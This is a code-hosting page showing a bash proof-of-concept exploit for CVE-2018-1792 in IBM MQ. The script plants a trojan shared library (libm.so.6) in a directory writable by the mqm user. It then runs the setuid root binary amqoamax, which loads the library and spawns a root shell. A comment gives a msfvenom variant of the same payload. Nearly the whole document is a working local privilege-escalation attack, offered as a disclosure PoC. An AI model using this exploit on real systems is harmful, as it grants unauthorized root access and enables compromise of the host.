-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathCVE-2018-1792.sh
50 lines (43 loc) · 1.26 KB
/
CVE-2018-1792.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/bin/bash
# Author: Rich Mirch
# CVE: CVE-2018-1792
# Vendor Advisory: https://www-01.ibm.com/support/docview.wss?uid=ibm10734447
# Product: IBM MQ mulitple versions for UNIX/Linux
# Description:
# The amqoamax and amqoampx setuid root binaries are vulnerable to shared
# object injection because the RUNPATH is set to /opt/mqm/lib64 which is
# owned by the mqm user. This PoC will create a trojan horse library that
# executes a root shell when loaded.
#
# Note: This PoC uses libm.so.6 however other libraries can be used
#
# Usage: Execute as the mqm user
#
#set -x
SRC=$(mktemp).c
DST=/opt/mqm/lib64/libm.so.6
# /opt/mqm/lib64 is 555 by default
[[ -w /opt/mqm/lib64 ]] || chmod 755 /opt/mqm/lib64
# You can also use
# msfvenom -p linux/x64/exec \
# PrependSetgid=yes \
# PrependSetuid=yes \
# CMD=/bin/bash \
# -f elf-so > >/opt/mqm/lib64/libm.so.6
cat >${SRC?}<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
setregid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
gcc -fPIC -o woot.o -Wall -c ${SRC?}
gcc -Wall -shared \
-Wl,-soname,$(basename ${DST?}) \
-Wl,-init,woot -o ${DST?} woot.o
echo "Executing amqoamax; note: amqoampx will also work"
/opt/mqm/bin/security/amqoamax
rm -f woot.o ${SRC?} ${DST?}